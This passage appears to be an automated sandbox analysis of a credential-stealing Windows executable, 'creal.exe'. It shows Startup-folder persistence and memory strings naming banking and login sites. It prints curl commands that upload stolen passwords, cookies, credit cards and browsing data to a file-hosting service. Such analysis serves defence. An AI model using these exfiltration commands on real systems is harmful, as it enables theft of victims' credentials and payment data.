            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ocb.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cfb.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD2.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_queue.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_keccak.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_clmul.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dll
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA1.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des3.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Protocol\_scrypt.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\Desktop\creal.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16318
            Source: C:\Users\user\Desktop\creal.exeAPI coverage: 1.8 %
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A608B00 FindFirstFileExW,FindClose,0_2_00007FF67A608B00
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A621FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF67A621FE4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE8B00 FindFirstFileExW,FindClose,26_2_00007FF7C3CE8B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D01FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00007FF7C3D01FE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C1490 GetSystemInfo,2_2_00007FF8E68C1490
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: creal.exe, 0000001A.00000003.1546499713.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: creal.exe, 00000002.00000003.1521292188.00000185BB369000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516110716.00000185BB358000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518329891.00000185BB35B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1550841441.00000185BB36F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1525447368.00000185BB36B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: curl.exe, 00000008.00000003.1468606378.000001F32FE33000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000003.1480700681.0000024F21CC4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1495934456.0000021D976C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1499016491.0000018B7EC38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000014.00000002.1500645147.00000281E010B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000002.1502681292.000002B6485A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67A61ACD8
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A623BF0 GetProcessHeap,0_2_00007FF67A623BF0
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60C860 SetUnhandledExceptionFilter,0_2_00007FF67A60C860
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF67A60BDE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67A60C67C
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69DABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E69DABE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6EF1460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6EF1460
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6EF1A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6EF1A30
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F01390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F01390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F01960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F01960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F11390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F11390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F11960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F11960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F21390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F21960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F31390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F31390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F31960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F31960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F41390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F41390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F41960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F41960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F51390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F51390
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\Desktop\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exe Code function: 0_2_00007FF67A629F40 cpuid 0_2_00007FF67A629F40
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\certifi VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\Desktop\creal.exe VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\win32 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32 VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pyd VolumeInformation
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\Desktop\creal.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\creal.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip VolumeInformationJump to behavior
